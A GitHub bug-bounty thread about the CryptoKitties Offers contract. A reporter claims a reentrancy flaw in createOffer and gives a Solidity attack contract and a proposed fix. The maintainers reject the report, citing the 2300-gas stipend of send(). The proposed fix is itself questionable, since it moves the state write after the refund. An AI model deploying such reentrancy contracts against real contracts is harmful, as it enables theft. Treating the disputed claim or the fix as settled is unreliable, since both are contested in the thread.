### ISSUE TITLE
Critical reentracy bug in createOffer can steal all funds

### ISSUE THREAD

**Issue by wharris1979** [dapperlabs/cryptokitties-bounty-2#25]
### Description

The function `createOffer()` is subject to a reentrancy attack that can siphon all funds out of the contract.

This is because the contract saves the new offer to tokenIdToOffer before refunding the previous bidder.

The correct order would be: delete previous offer, refund previous bidder, save new offer.

### Scenario

An attacker can create a malicious contract that calls createOffer in its fallback function, and that has a separate function that calls createOffer(). Upon calling createOffer twice from this contract with an increased offer the second time, reentrancy will occur, removing all funds from the Offers contract.

### Impact

Critical: High likelihood and high impact to remove all eth from contract

### Reproduction

(1) Attacker creates the following contract:
```
pragma solidity ^0.4.8;
import "./Offers.sol";
contract OffersCollect {
  Offers public offers;
  uint256 targetTokenID;
  function OffersCollect (address _offers, uint256 _targetTokenID) {
    offers = Offers(_offers);
    targetTokenID = _targetTokenID;
  }
  function kill () onlyOwner  {
    suicide(msg.sender);
  }
  function attackCreateOfferFunction() payable {
    offers.createOffer(targetTokenID).value(msg.value);
  }
  function () payable {
    if (offers.balance >= msg.value) {
      offers.createOffer(targetTokenID);
    }
  }
}
```
(2) Attacker calls attackCreateOfferFunction once with 0.1 eth (or any arbitrary amount larger than minimumTotalValue). Since no offer yet exists for targetTokenID, no refund will be activated yet. Offers.sol will save the attacking contract as the current bidder with a bid of 0.1 eth.

(3) Attacker calls attackCreateOfferFunction a second time with 0.2 eth (or any arbitrary amount larger than the first bid).

(4) Since an offer already exists for targetTokenID, `createOffer` will trigger a refund. It will save the attacking contract as the new bidder and will send a refund to it.

(5) However, since the attacking contract has a payable fallback function that calls createOffer, sending the refund will cause a second call to createOffer. This process will continue until either the stack is exceeded or `(offers.balance >= msg.value)` check fails.

(6) Attacker will have successfully siphoned nearly all of the funds out of Offers.sol.

### Fix

Change this: 
```
tokenIdToOffer[_tokenId] = Offer(
            uint64(newExpiresAt),
            msg.sender,
            uint16(_offerCut),
            uint128(total),
            uint128(unsuccessfulFee)
        );

        // Postpone the refund until the previous offer has been overwritten by the new offer.
        if (toRefund > 0) {
            // Finally, sending funds to this bidder. If failed, the fund will be kept in escrow
            // under lostAndFound's address
            _tryPushFunds(
                _tokenId,
                previousBidder,
                toRefund
            );
        }
```
to this:
```
delete tokenIdToOffer[_tokenId];

        if (toRefund > 0) {
            // Finally, sending funds to this bidder. If failed, the fund will be kept in escrow
            // under lostAndFound's address
            _tryPushFunds(
                _tokenId,
                previousBidder,
                toRefund
            );
        }

tokenIdToOffer[_tokenId] = Offer(
            uint64(newExpiresAt),
            msg.sender,
            uint16(_offerCut),
            uint128(total),
            uint128(unsuccessfulFee)
        );
```

**Comment by sunsetlover** [comment]
`tryPushFunds` uses `address.to(amt)` to transfer ether. I believe that this actually makes it safe against reentry attacks because in my understanding it only allocate 2300 gas to the fallback function. See: https://ethereum.stackexchange.com/questions/6341/is-address-send-not-vulnerable-for-the-recursive-call-attack

**Comment by hwrdtm** [comment]
Thanks @wharris1979 for your feedback! 

Our `createOffer` function uses the `internal` function `_tryPushFunds`, which actually calls the `address.send(amount)`. According to the [solidity docs](https://solidity.readthedocs.io/en/v0.4.24/units-and-global-variables.html#address-related), a gas stipend of only 2300 is forwarded, which will **not** be enough for another smart contract to call `.createOffer` again and cause a re-entrancy attack.

Moreover, the code follows the [checks-effects-interactions pattern](https://solidity.readthedocs.io/en/develop/security-considerations.html?highlight=check%20effects#use-the-checks-effects-interactions-pattern) in order to defend against re-entrancy attacks.

For the above reasons, we consider your scenario to be incorrect and the specified vulnerability to be invalid.

Closing for now.
